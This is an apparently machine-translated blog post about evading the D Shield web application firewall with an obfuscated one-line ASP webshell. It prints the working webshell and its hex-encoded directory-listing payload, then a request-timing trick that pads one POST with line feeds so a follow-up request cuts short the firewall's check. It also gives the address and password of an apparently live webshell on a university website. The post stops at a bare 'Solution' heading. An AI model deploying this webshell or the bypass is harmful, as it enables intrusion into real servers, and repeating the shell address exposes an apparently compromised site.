D. Shield bypasses a wonderful line of dynamic code

D. Shield bypasses a wonderful line of dynamic code

D shield blocked the execution of the input dynamic script, but we can bypass it in a strange way.

One sentence address: http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp password: z ordinary kitchen knife is not connected to the drop.

The Code is as follows:
 

<%
Function decode(ByVal s, ByVal key)    For i = 1 To Len(s) Step 2        c = Mid(s, i, 2)        k = (i + 1) / 2 Mod Len(key) + 1        p = Mid(key, k, 1)        If IsNumeric(Mid(s, i, 1)) Then            decode = decode & Chr(("&H" & c) - p)        Else            decode = decode & Chr("&H" & c & Mid(s, i + 2, 2))            i = i + 2        End If    NextEnd FunctionExecute decode("4A7A6C6C7A766C3169676A7869672F7B6A737C6E78762F2B7F2430357767787E6A757B31276D6C82272B3032","9527")%>

That is, the input parameter z is decoded by the decode function and executed.

Encode Response. Write (2333333 + 1) and run the code (526573706F6E73652E577269746528323333333333332B3129 ).
 

However, when we encoded the data packet of the kitchen knife, the code was intercepted relentlessly:

Code Before encoding:
 

Response.Write("->|"):Dim RR:RR=decode(Request("k1"),Request("key")):Function FD(dt):FD=Year(dt)&"-":If Len(Month(dt))=1 Then:FD = FD&"0":End If:FD=FD&Month(dt)&"-":If Len(Day(dt))=1 Then:FD=FD&"0":End If:FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":":If Len(Second(dt))=1 Then:FD=FD&"0":End If:FD=FD&Second(dt):End Function:SET C=CreateObject("Scripting.FileSystemObject"):Set FO=C.GetFolder(""&RR&""):If Err Then:Response.Write("ERROR:// "&Err.Description):Err.Clear:Else:For Each F in FO.subfolders:Response.Write F.Name:Next:For Each L in FO.files:Response.Write L.Name:Next:End If:Response.Write("|<-"):Response.End

After encoding:
 

526573706F6E73652E577269746528222D3E7C22293A44696D2052523A52523D6465636F6465285265717565737428226B3122292C5265717565737428226B65792229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D204644262230223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D61744461746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6E73652E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E577269746520462E4E616D653A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D653A4E6578743A456E642049663A526573706F6E73652E577269746528227C3C2D22293A526573706F6E73652E456E64

 

There are no keywords in the data packet. Obviously, the interception of D shield is not during transmission. D shield can detect calls to some sensitive methods by the code During code decoding and execution, such as FSO.

However, when I do not execute code dynamically (written to the Web directory of the server), the results can be obtained successfully.
 

After combing the entire process, we can conclude that D shield checks the final content of the dynamic code (no matter how users [encrypt]), however, we can also conclude that such detection will consume a certain amount of system resources. So how can we minimize resource consumption? The final test showed that D shield detected every request of the user, but at the same time, it terminated the check on all previous requests when detecting subsequent requests.



Therefore, a bypass solution was born. We constructed enough dynamic code for the first request package to take some time for detection. Make sure that the dynamic code in the first request has not been detected, and then send the second request (the second request does not contain any URL of the dynamic code GET website ), then the check for the first request will be completed in the future. (Note: I add a lot of 0A [line feed] Before dynamic code to consume the detection time)



First request:

Http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp

POST
 

Z = 0A0A... omitted many 0A0A... Values & key = 00000 & k1 = values

Second request: Direct GET request http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp

Direct POST sending is intercepted:
 

According to the above method, the dynamic code is successfully executed:
 

 

 

 

 

Solution:

Logic